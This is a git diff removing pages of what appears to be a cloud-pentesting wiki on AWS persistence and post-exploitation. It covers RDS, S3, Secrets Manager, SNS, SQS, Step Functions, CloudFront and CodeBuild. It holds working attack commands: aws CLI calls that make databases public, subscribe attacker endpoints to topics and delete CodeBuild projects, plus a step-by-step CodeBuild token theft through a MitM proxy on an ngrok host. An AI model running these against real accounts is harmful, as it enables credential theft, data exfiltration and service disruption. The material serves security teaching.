-{% endhint %} - -## RDS - -For more information check: - -{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} -[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) -{% endcontent-ref %} - -### Make instance publicly accessible: `rds:ModifyDBInstance` - -An attacker with this permission can **modify an existing RDS instance to enable public accessibility**. - -{% code overflow="wrap" %} -```bash -aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately -``` -{% endcode %} - -### Create an admin user inside the DB - -An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database. - -### Make snapshot public - -{% code overflow="wrap" %} -```bash -aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md deleted file mode 100644 index c821dbd6a..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md +++ /dev/null @@ -1,51 +0,0 @@ -# AWS - S3 Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## S3 - -For more information check: - -{% content-ref url="../aws-services/aws-s3-athena-and-glacier-enum.md" %} -[aws-s3-athena-and-glacier-enum.md](../aws-services/aws-s3-athena-and-glacier-enum.md) -{% endcontent-ref %} - -### KMS Client-Side Encryption - -When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again: - -
- -Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it. - -### Using S3 ACLs - -Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md deleted file mode 100644 index 9349605bc..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md +++ /dev/null @@ -1,79 +0,0 @@ -# AWS - Secrets Manager Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secrets Manager - -For more info check: - -{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} -[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) -{% endcontent-ref %} - -### Via Resource Policies - -It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**. - -### Via Secrets Rotate Lambda - -To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself. - -This is how lambda code for such action could look like: - -```python -import boto3 - -def rotate_secrets(event, context): - # Create a Secrets Manager client - client = boto3.client('secretsmanager') - - # Retrieve the current secret value - secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString'] - - # Rotate the secret by updating its value - new_secret_value = rotate_secret(secret_value) - client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value) - -def rotate_secret(secret_value): - # Perform the rotation logic here, e.g., generate a new password - - # Example: Generate a new password - new_secret_value = generate_password() - - return new_secret_value - -def generate_password(): - # Example: Generate a random password using the secrets module - import secrets - import string - password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16)) - return password -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team 
Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md deleted file mode 100644 index cb0b70d82..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md +++ /dev/null @@ -1,107 +0,0 @@ -# AWS - SNS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SNS - -For more information check: - -{% content-ref url="../aws-services/aws-sns-enum.md" %} -[aws-sns-enum.md](../aws-services/aws-sns-enum.md) -{% endcontent-ref %} - -### Persistence - -When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ -The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**: - -```json -{ - "Version": "2008-10-17", - "Id": "__default_policy_ID", - "Statement": [ - { - "Sid": "__default_statement_ID", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "SNS:Publish", - "SNS:RemovePermission", - "SNS:SetTopicAttributes", - "SNS:DeleteTopic", - "SNS:ListSubscriptionsByTopic", - "SNS:GetTopicAttributes", - "SNS:AddPermission", - "SNS:Subscribe" - ], - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo", - "Condition": { - "StringEquals": { - "AWS:SourceOwner": "318142138553" - } - } - }, - { - "Sid": "__console_pub_0", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "SNS:Publish", - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" - }, - { - "Sid": "__console_sub_0", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "SNS:Subscribe", - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" - } - ] -} -``` - -### Create Subscribers - -To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**. - -Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used. 
- -```bash -aws sns subscribe --region \ - --protocol http \ - --notification-endpoint http:/// \ - --topic-arn -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md deleted file mode 100644 index 88c12a549..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md +++ /dev/null @@ -1,68 +0,0 @@ -# AWS - SQS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SQS - -For more information check: - -{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} -[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) -{% endcontent-ref %} - -### Using resource policy - -In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ -The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**: - -```json -{ - "Version": "2008-10-17", - "Id": "__default_policy_ID", - "Statement": [ - { - "Sid": "__owner_statement", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "SQS:*" - ], - "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue" - } - ] -} -``` - -{% hint style="info" %} -You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} -{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md deleted file mode 100644 index 0c7b2c9e4..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# AWS - Step Functions Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Step Functions - -For more information check: - -{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %} -[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md) -{% endcontent-ref %} - -### Step function Backdooring - -Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps. - -### Backdooring aliases - -If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md deleted file mode 100644 index 8a7a800b7..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md +++ /dev/null @@ -1,57 +0,0 @@ -# AWS - CloudFront Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## CloudFront - -For more information check: - -{% content-ref url="../aws-services/aws-cloudfront-enum.md" %} -[aws-cloudfront-enum.md](../aws-services/aws-cloudfront-enum.md) -{% endcontent-ref %} - -### Man-in-the-Middle - -This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script). - -#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket - -* **Create** the malicious **function**. -* **Associate** it with the CloudFront distribution. -* Set the **event type to "Viewer Response"**. - -Accessing the response you could steal the users cookie and inject a malicious JS. - -#### scenario 2: MitM where CloudFront is already using a lambda function - -* **Modify the code** of the lambda function to steal sensitive information - -You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
deleted file mode 100644
index d0db82e8c..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
+++ /dev/null
@@ -1,111 +0,0 @@
-# AWS - CodeBuild Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## CodeBuild
-
-For more information, check:
-
-{% content-ref url="../../aws-services/aws-codebuild-enum.md" %}
-[aws-codebuild-enum.md](../../aws-services/aws-codebuild-enum.md)
-{% endcontent-ref %}
-
-### Check Secrets
-
-If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\
-Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform.
-
-{% content-ref url="../../aws-privilege-escalation/aws-secrets-manager-privesc.md" %}
-[aws-secrets-manager-privesc.md](../../aws-privilege-escalation/aws-secrets-manager-privesc.md)
-{% endcontent-ref %}
-
-### Abuse CodeBuild Repo Access
-
-In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code:
-
-
-
-The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**.
-
-An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\
-In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you):
-
-
-
-And **change the Buildspec commands to exfiltrate each repo**.
-
-{% hint style="warning" %}
-However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\
-Or does he? Check the next section
-{% endhint %}
-
-### Leaking Access Tokens from AWS CodeBuild
-
-You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with:
-
-```bash
-aws codebuild list-source-credentials
-```
-
-{% content-ref url="aws-codebuild-token-leakage.md" %}
-[aws-codebuild-token-leakage.md](aws-codebuild-token-leakage.md)
-{% endcontent-ref %}
-
-### `codebuild:DeleteProject`
-
-An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project.
-
-```bash
-aws codebuild delete-project --name
-```
-
-**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project.
-
-### `codebuild:TagResource` , `codebuild:UntagResource`
-
-An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
-
-```bash
-aws codebuild tag-resource --resource-arn --tags
-aws codebuild untag-resource --resource-arn --tag-keys
-```
-
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
-
-### `codebuild:DeleteSourceCredentials`
-
-An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository.
-
-```sql
-aws codebuild delete-source-credentials --arn
-```
-
-**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
deleted file mode 100644
index 51a05bbb1..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
+++ /dev/null
@@ -1,222 +0,0 @@
-# AWS Codebuild - Token Leakage
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Recover Github/Bitbucket Configured Tokens
-
-First, check if there are any source credentials configured that you could leak:
-
-```bash
-aws codebuild list-source-credentials
-```
-
-### Via Docker Image
-
-If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project.
-
-For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**.
-
-The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**.
-
-1. **Create & Upload your own Docker MitM image**
- * Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**.
- * **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint.
- * You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host
- * Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...)
-2. **Set the environment**
- * Create a **new Codebuild project** or **modify** the environment of an existing one.
- * Set the project to use the **previously generated Docker image**
-
-
-
-3. **Set the MitM proxy in your host**
-
-* As indicated in the **Github repo** you could use something like:
-
-```bash
-mitmproxy --listen-port 4444 --allow-hosts "github.com"
-```
-
-{% hint style="success" %}
-The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work.
-{% endhint %}
-
-4. **Run the build & capture the credentials**
-
-* You can see the token in the **Authorization** header:
-
-
-
-This could also be done from the aws cli with something like
-
-{% code overflow="wrap" %}
-```bash
-# Create project using a Github connection
-aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
-
-## With /tmp/buildspec.json
-{
- "name": "my-demo-project",
- "source": {
- "type": "GITHUB",
- "location": "https://github.com/uname/repo",
- "buildspec": "buildspec.yml"
- },
- "artifacts": {
- "type": "NO_ARTIFACTS"
- },
- "environment": {
- "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
- "image": "docker.io/carlospolop/docker-mitm:v12",
- "computeType": "BUILD_GENERAL1_SMALL",
- "imagePullCredentialsType": "CODEBUILD"
- }
-}
-
-## Json
-
-# Start the build
-aws codebuild start-build --project-name my-project2
-```
-{% endcode %}
-
-### Via insecureSSL
-
-**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\
-Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform.
-
-* First you need to enumerate the current configuration with something like:
-
-```bash
-aws codebuild batch-get-projects --name
-```
-
-* Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration).
- * Moreover, add also the env variables **http\_proxy** and **https\_proxy** pointing to your tcp ngrok like:
-
-{% code overflow="wrap" %}
-```bash
-aws codebuild update-project --name \
- --source '{
- "type": "GITHUB",
- "location": "https://github.com/carlospolop/404checker",
- "gitCloneDepth": 1,
- "gitSubmodulesConfig": {
- "fetchSubmodules": false
- },
- "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n",
- "auth": {
- "type": "CODECONNECTIONS",
- "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
- },
- "reportBuildStatus": false,
- "insecureSsl": true
- }' \
- --environment '{
- "type": "LINUX_CONTAINER",
- "image": "aws/codebuild/standard:5.0",
- "computeType": "BUILD_GENERAL1_SMALL",
- "environmentVariables": [
- {
- "name": "http_proxy",
- "value": "http://2.tcp.eu.ngrok.io:15027"
- },
- {
- "name": "https_proxy",
- "value": "http://2.tcp.eu.ngrok.io:15027"
- }
- ]
- }'
-```
-{% endcode %}
-
-* Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy)
-
-```python
-from mitm import MITM, protocol, middleware, crypto
-
-mitm = MITM(
- host="0.0.0.0",
- port=4444,
- protocols=[protocol.HTTP],
- middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
- certificate_authority = crypto.CertificateAuthority()
-)
-mitm.run()
-```
-
-* Next, click on **Build the project** or start the build from command line:
-
-```sh
-aws codebuild start-build --project-name
-```
-
-* Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port:
-
-
-
-### ~~Via HTTP protocol~~
-
-{% hint style="success" %}
-**This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)**
-{% endhint %}
-
-An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**.
-
